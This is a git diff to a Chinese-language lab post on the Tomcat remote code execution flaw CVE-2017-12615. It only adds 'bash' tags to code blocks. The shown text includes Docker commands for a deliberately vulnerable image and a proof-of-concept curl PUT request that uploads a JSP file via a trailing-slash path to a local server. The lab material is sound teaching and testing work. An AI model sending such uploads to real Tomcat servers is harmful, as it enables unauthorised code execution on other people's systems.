--- a/_posts/2017-09-21-t_tomcat_1.md
+++ b/_posts/2017-09-21-t_tomcat_1.md
@@ -27,12 +27,12 @@ introduction: 'Tomcat 远程代码执行漏洞 (CVE-2017-12615)环境'
 ### 获取环境:
 
 1. 拉取镜像到本地
- ```
+ ```bash
 $ docker pull medicean/vulapps:t_tomcat_1
  ```
 
 2. 启动环境
- ```
+ ```bash
 $ docker run -d -p 8080:8080 medicean/vulapps:t_tomcat_1
  ```
  > `-p 8080:8080` 前面的 8080 代表物理机的端口，可随意指定。 
@@ -44,7 +44,7 @@ $ docker run -d -p 8080:8080 medicean/vulapps:t_tomcat_1
 #### PoC
 
 1. 向目标发起 PUT 请求，注意后缀为 `.jsp/`
-    ```
+    ```bash
 $ curl -X PUT "http://127.0.0.1:8080/123.jsp/" -d '<%out.println("test");%>'
     ```
 
